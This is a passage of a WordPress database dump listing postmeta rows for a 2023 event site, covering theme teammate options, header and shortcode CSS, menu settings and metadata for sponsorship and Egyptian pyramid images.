(26808,3643,'_dt_teammate_options_you-tube',''),
(26809,3643,'_dt_teammate_options_rss',''),
(26810,3643,'_dt_teammate_options_delicious',''),
(26811,3643,'_dt_teammate_options_flickr',''),
(26812,3643,'_dt_teammate_options_lastfm',''),
(26813,3643,'_dt_teammate_options_linkedin',''),
(26814,3643,'_dt_teammate_options_vimeo',''),
(26815,3643,'_dt_teammate_options_tumbler',''),
(26816,3643,'_dt_teammate_options_pinterest',''),
(26817,3643,'_dt_teammate_options_devian',''),
(26818,3643,'_dt_teammate_options_skype',''),
(26819,3643,'_dt_teammate_options_github',''),
(26820,3643,'_dt_teammate_options_instagram',''),
(26821,3643,'_dt_teammate_options_stumbleupon',''),
(26822,3643,'_dt_teammate_options_behance',''),
(26823,3643,'_dt_teammate_options_px-500',''),
(26824,3643,'_dt_teammate_options_tripedvisor',''),
(26825,3643,'_dt_teammate_options_vk',''),
(26826,3643,'_dt_teammate_options_foursquare',''),
(26827,3643,'_dt_teammate_options_xing',''),
(26828,3643,'_dt_teammate_options_weibo',''),
(26829,3643,'_dt_teammate_options_odnoklassniki',''),
(26830,3643,'_dt_teammate_options_research-gate',''),
(26831,3643,'_dt_teammate_options_yelp',''),
(26832,3643,'_dt_teammate_options_blogger',''),
(26833,3643,'_dt_teammate_options_soundcloud',''),
(26834,3643,'_dt_teammate_options_viber',''),
(26835,3643,'_dt_teammate_options_whatsapp',''),
(26836,3643,'_dt_teammate_options_reddit',''),
(26837,3643,'_dt_teammate_options_snapchat',''),
(26838,3643,'_dt_teammate_options_telegram',''),
(26839,3643,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(26840,3645,'_menu_item_type','custom'),
(26841,3645,'_menu_item_menu_item_parent','0'),
(26842,3645,'_menu_item_object_id','3645'),
(26843,3645,'_menu_item_object','custom'),
(26844,3645,'_menu_item_target',''),
(26845,3645,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(26846,3645,'_menu_item_xfn',''),
(26847,3645,'_menu_item_url','https://gsw2023.com/index.php/project/youth-presentation-forum/'),
(26849,2082,'_wp_old_date','2023-01-14'),
(26850,2083,'_wp_old_date','2023-01-14'),
(26851,2346,'_wp_old_date','2023-01-14'),
(26852,2348,'_wp_old_date','2023-01-14'),
(26853,2349,'_wp_old_date','2023-01-14'),
(26854,2350,'_wp_old_date','2023-01-14'),
(26855,2351,'_wp_old_date','2023-01-14'),
(26856,2904,'_wp_old_date','2023-01-14'),
(26857,3556,'_wp_old_date','2023-01-14'),
(26858,2084,'_wp_old_date','2023-01-14'),
(26859,2352,'_wp_old_date','2023-01-14'),
(26860,2281,'_wp_old_date','2023-01-14'),
(26861,2353,'_wp_old_date','2023-01-14'),
(26862,2354,'_wp_old_date','2023-01-14'),
(26863,2355,'_wp_old_date','2023-01-14'),
(26864,2282,'_wp_old_date','2023-01-14'),
(26865,2283,'_wp_old_date','2023-01-14'),
(26866,2284,'_wp_old_date','2023-01-14'),
(26867,2921,'_wp_old_date','2023-01-14'),
(26868,2285,'_wp_old_date','2023-01-14'),
(26869,2356,'_wp_old_date','2023-01-14'),
(26870,2357,'_wp_old_date','2023-01-14'),
(26871,2359,'_wp_old_date','2023-01-14'),
(26872,2358,'_wp_old_date','2023-01-14'),
(26873,2286,'_wp_old_date','2023-01-14'),
(26874,2685,'_oembed_0bfe5805143df082e978efdc24beb08d','{{unknown}}'),
(26875,2685,'_oembed_e4e9ebf0e0b46e595f4219a8e85443aa','{{unknown}}'),
(26876,2685,'_oembed_5cda2e1111b8ba84e3338f1d037a02b6','{{unknown}}'),
(26877,3654,'_wp_attached_file','2023/01/New-SPONSORSHIP.jpg'),
(26878,3654,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:507;s:6:\"height\";i:553;s:4:\"file\";s:27:\"2023/01/New-SPONSORSHIP.jpg\";s:8:\"filesize\";i:143121;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"New-SPONSORSHIP-275x300.jpg\";s:5:\"width\";i:275;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26826;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"New-SPONSORSHIP-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7489;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:27:\"New-SPONSORSHIP-500x545.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74058;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26879,3659,'_wp_attached_file','2023/01/egyptian-pyramids_m.jpg'),
(26880,3659,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1462;s:6:\"height\";i:750;s:4:\"file\";s:31:\"2023/01/egyptian-pyramids_m.jpg\";s:8:\"filesize\";i:422929;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"egyptian-pyramids_m-300x154.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:154;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10985;}s:5:\"large\";a:5:{s:4:\"file\";s:32:\"egyptian-pyramids_m-1024x525.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105322;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"egyptian-pyramids_m-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6812;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:31:\"egyptian-pyramids_m-768x394.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:394;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62330;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:31:\"egyptian-pyramids_m-500x256.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28180;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:31:\"egyptian-pyramids_m-800x410.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67172;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:32:\"egyptian-pyramids_m-1280x657.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:657;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:156626;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D800\";s:7:\"caption\";s:46:\"Egyptian pyramids in sand desert and clear sky\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:8:\"Bigstock\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:46:\"Egyptian Pyramids In Sand Desert And Clear Sky\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:45:{i:0;s:5:\"Cairo\";i:1;s:5:\"Egypt\";i:2;s:7:\"african\";i:3;s:7:\"ancient\";i:4;s:11:\"archaeology\";i:5;s:12:\"architecture\";i:6;s:10:\"attraction\";i:7;s:5:\"clear\";i:8;s:6:\"desert\";i:9;s:11:\"destination\";i:10;s:3:\"dry\";i:11;s:8:\"egyptian\";i:12;s:7:\"evening\";i:13;s:6:\"famous\";i:14;s:4:\"giza\";i:15;s:5:\"great\";i:16;s:4:\"heat\";i:17;s:10:\"historical\";i:18;s:7:\"history\";i:19;s:3:\"hot\";i:20;s:9:\"landscape\";i:21;s:8:\"monument\";i:22;s:7:\"morning\";i:23;s:10:\"necropolis\";i:24;s:3:\"old\";i:25;s:6:\"orange\";i:26;s:4:\"past\";i:27;s:7:\"pharaoh\";i:28;s:7:\"pyramid\";i:29;s:7:\"remains\";i:30;s:4:\"ruin\";i:31;s:4:\"sand\";i:32;s:4:\"site\";i:33;s:3:\"sky\";i:34;s:5:\"stone\";i:35;s:6:\"summer\";i:36;s:3:\"sun\";i:37;s:8:\"sunlight\";i:38;s:7:\"sunrise\";i:39;s:6:\"sunset\";i:40;s:4:\"tomb\";i:41;s:7:\"tourism\";i:42;s:6:\"travel\";i:43;s:6:\"unesco\";i:44;s:6:\"yellow\";}}}'),
(26881,3660,'_wpb_shortcodes_custom_css','.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1673292178000{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(26882,3661,'_wp_attached_file','2023/01/egyptian-pyramids_m-1.jpg'),
(26883,3661,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1462;s:6:\"height\";i:750;s:4:\"file\";s:33:\"2023/01/egyptian-pyramids_m-1.jpg\";s:8:\"filesize\";i:422146;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"egyptian-pyramids_m-1-300x154.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:154;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11089;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"egyptian-pyramids_m-1-1024x525.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104418;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"egyptian-pyramids_m-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6775;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"egyptian-pyramids_m-1-768x394.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:394;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62265;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:33:\"egyptian-pyramids_m-1-500x256.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27872;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:33:\"egyptian-pyramids_m-1-800x410.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67078;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:34:\"egyptian-pyramids_m-1-1280x657.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:657;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:156467;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D800\";s:7:\"caption\";s:46:\"Egyptian pyramids in sand desert and clear sky\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:8:\"Bigstock\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:46:\"Egyptian Pyramids In Sand Desert And Clear Sky\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:45:{i:0;s:5:\"Cairo\";i:1;s:5:\"Egypt\";i:2;s:7:\"african\";i:3;s:7:\"ancient\";i:4;s:11:\"archaeology\";i:5;s:12:\"architecture\";i:6;s:10:\"attraction\";i:7;s:5:\"clear\";i:8;s:6:\"desert\";i:9;s:11:\"destination\";i:10;s:3:\"dry\";i:11;s:8:\"egyptian\";i:12;s:7:\"evening\";i:13;s:6:\"famous\";i:14;s:4:\"giza\";i:15;s:5:\"great\";i:16;s:4:\"heat\";i:17;s:10:\"historical\";i:18;s:7:\"history\";i:19;s:3:\"hot\";i:20;s:9:\"landscape\";i:21;s:8:\"monument\";i:22;s:7:\"morning\";i:23;s:10:\"necropolis\";i:24;s:3:\"old\";i:25;s:6:\"orange\";i:26;s:4:\"past\";i:27;s:7:\"pharaoh\";i:28;s:7:\"pyramid\";i:29;s:7:\"remains\";i:30;s:4:\"ruin\";i:31;s:4:\"sand\";i:32;s:4:\"site\";i:33;s:3:\"sky\";i:34;s:5:\"stone\";i:35;s:6:\"summer\";i:36;s:3:\"sun\";i:37;s:8:\"sunlight\";i:38;s:7:\"sunrise\";i:39;s:6:\"sunset\";i:40;s:4:\"tomb\";i:41;s:7:\"tourism\";i:42;s:6:\"travel\";i:43;s:6:\"unesco\";i:44;s:6:\"yellow\";}}}'),
(26884,3662,'_wp_attached_file','2023/01/egyptian-pyramids_m-2-e1686753439214.jpg'),
(26885,3662,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1462;s:6:\"height\";i:387;s:4:\"file\";s:48:\"2023/01/egyptian-pyramids_m-2-e1686753439214.jpg\";s:8:\"filesize\";i:422146;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:47:\"egyptian-pyramids_m-2-e1686753439214-300x79.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6763;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"egyptian-pyramids_m-2-e1686753439214-1024x271.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53857;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-2-e1686753439214-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7910;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-2-e1686753439214-768x203.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33691;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-2-e1686753439214-500x132.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:132;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16371;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-2-e1686753439214-800x212.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35753;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:49:\"egyptian-pyramids_m-2-e1686753439214-1280x339.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:339;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78960;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D800\";s:7:\"caption\";s:46:\"Egyptian pyramids in sand desert and clear sky\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:8:\"Bigstock\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:46:\"Egyptian Pyramids In Sand Desert And Clear Sky\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:45:{i:0;s:5:\"Cairo\";i:1;s:5:\"Egypt\";i:2;s:7:\"african\";i:3;s:7:\"ancient\";i:4;s:11:\"archaeology\";i:5;s:12:\"architecture\";i:6;s:10:\"attraction\";i:7;s:5:\"clear\";i:8;s:6:\"desert\";i:9;s:11:\"destination\";i:10;s:3:\"dry\";i:11;s:8:\"egyptian\";i:12;s:7:\"evening\";i:13;s:6:\"famous\";i:14;s:4:\"giza\";i:15;s:5:\"great\";i:16;s:4:\"heat\";i:17;s:10:\"historical\";i:18;s:7:\"history\";i:19;s:3:\"hot\";i:20;s:9:\"landscape\";i:21;s:8:\"monument\";i:22;s:7:\"morning\";i:23;s:10:\"necropolis\";i:24;s:3:\"old\";i:25;s:6:\"orange\";i:26;s:4:\"past\";i:27;s:7:\"pharaoh\";i:28;s:7:\"pyramid\";i:29;s:7:\"remains\";i:30;s:4:\"ruin\";i:31;s:4:\"sand\";i:32;s:4:\"site\";i:33;s:3:\"sky\";i:34;s:5:\"stone\";i:35;s:6:\"summer\";i:36;s:3:\"sun\";i:37;s:8:\"sunlight\";i:38;s:7:\"sunrise\";i:39;s:6:\"sunset\";i:40;s:4:\"tomb\";i:41;s:7:\"tourism\";i:42;s:6:\"travel\";i:43;s:6:\"unesco\";i:44;s:6:\"yellow\";}}}'),
(26886,3663,'_wp_attached_file','2023/01/egyptian-pyramids_m-3-e1680402718830.jpg'),
(26887,3663,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1462;s:6:\"height\";i:570;s:4:\"file\";s:48:\"2023/01/egyptian-pyramids_m-3-e1680402718830.jpg\";s:8:\"filesize\";i:422146;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-3-e1680402718830-300x117.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:117;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9176;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"egyptian-pyramids_m-3-e1680402718830-1024x399.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75422;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-3-e1680402718830-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7372;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-3-e1680402718830-768x299.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:299;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46692;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-3-e1680402718830-500x195.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:195;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22150;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-3-e1680402718830-800x312.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:312;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49621;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:49:\"egyptian-pyramids_m-3-e1680402718830-1280x499.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:499;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111507;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D800\";s:7:\"caption\";s:46:\"Egyptian pyramids in sand desert and clear sky\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:8:\"Bigstock\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:46:\"Egyptian Pyramids In Sand Desert And Clear Sky\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:45:{i:0;s:5:\"Cairo\";i:1;s:5:\"Egypt\";i:2;s:7:\"african\";i:3;s:7:\"ancient\";i:4;s:11:\"archaeology\";i:5;s:12:\"architecture\";i:6;s:10:\"attraction\";i:7;s:5:\"clear\";i:8;s:6:\"desert\";i:9;s:11:\"destination\";i:10;s:3:\"dry\";i:11;s:8:\"egyptian\";i:12;s:7:\"evening\";i:13;s:6:\"famous\";i:14;s:4:\"giza\";i:15;s:5:\"great\";i:16;s:4:\"heat\";i:17;s:10:\"historical\";i:18;s:7:\"history\";i:19;s:3:\"hot\";i:20;s:9:\"landscape\";i:21;s:8:\"monument\";i:22;s:7:\"morning\";i:23;s:10:\"necropolis\";i:24;s:3:\"old\";i:25;s:6:\"orange\";i:26;s:4:\"past\";i:27;s:7:\"pharaoh\";i:28;s:7:\"pyramid\";i:29;s:7:\"remains\";i:30;s:4:\"ruin\";i:31;s:4:\"sand\";i:32;s:4:\"site\";i:33;s:3:\"sky\";i:34;s:5:\"stone\";i:35;s:6:\"summer\";i:36;s:3:\"sun\";i:37;s:8:\"sunlight\";i:38;s:7:\"sunrise\";i:39;s:6:\"sunset\";i:40;s:4:\"tomb\";i:41;s:7:\"tourism\";i:42;s:6:\"travel\";i:43;s:6:\"unesco\";i:44;s:6:\"yellow\";}}}'),
(26888,3066,'_thumbnail_id','5304'),
(26892,3670,'_wp_page_template','default'),
(26893,3670,'_wpb_vc_js_status','true'),
(26894,3670,'_dt_sidebar_position','disabled'),
(26895,3670,'_dt_sidebar_widgetarea_id','sidebar_1'),
(26896,3670,'_dt_sidebar_hide_on_mobile','0'),
(26897,3670,'_dt_footer_show','0'),
(26898,3670,'_dt_footer_widgetarea_id','sidebar_2'),
(26899,3670,'_dt_footer_hide_on_mobile','0'),
(26900,3670,'_dt_header_title','fancy'),
(26901,3670,'_dt_header_background','normal'),
(26902,3670,'_dt_header_background_below_slideshow','disabled'),
(26903,3670,'_dt_header_transparent_bg_color','#000000'),
(26904,3670,'_dt_header_transparent_bg_opacity','50'),
(26905,3670,'_dt_header_transparent_bg_color_scheme','light'),
(26906,3670,'_dt_header_disabled_background','normal'),
(26907,3670,'_dt_header_disabled_transparent_bg_color','#000000'),
(26908,3670,'_dt_header_disabled_transparent_bg_opacity','50'),
(26909,3670,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(26910,3670,'_dt_header_transparent_top_bar_bg_color',''),
(26911,3670,'_dt_header_transparent_top_bar_bg_opacity','0'),
(26912,3670,'_dt_header_disabled_transparent_top_bar_bg_color',''),
(26913,3670,'_dt_header_disabled_transparent_top_bar_bg_opacity','0'),
(26914,3670,'_dt_page_overrides_top_margin',''),
(26915,3670,'_dt_page_overrides_bottom_margin',''),
(26916,3670,'the7_shortcodes_inline_css','.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article {\n  margin-top: ;\n  padding-top: 0;\n  border-color: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-thumbnail-wrap {\n  width: ;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list .post-entry-content {\n  margin-top: -100px;\n  width: 75%;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list:not(.mode-list) .no-img .post-entry-content {\n  margin-top: 0;\n  width: 100%;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list.mode-list .no-img .post-entry-content {\n  margin-top: 0;\n}\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content {\n  background: linear-gradient(to bottom,#f7f7f7,#f7f7f7) no-repeat 0px 150px;\n}\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content:before {\n  background: #f7f7f7;\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\n}\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content {\n  background: #f7f7f7;\n  padding: 30px 30px 30px 30px;\n}\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content:before {\n  display: none;\n}\n#page 